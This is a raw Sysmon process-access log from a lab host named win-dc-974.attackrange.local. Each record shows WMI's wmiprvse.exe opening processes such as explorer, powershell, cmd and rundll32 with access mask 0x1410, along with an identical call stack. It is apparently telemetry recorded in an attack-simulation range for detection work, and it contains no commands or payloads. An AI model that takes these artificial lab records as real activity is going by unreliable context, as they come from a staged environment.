10341000x80000000000000002243392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.733{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 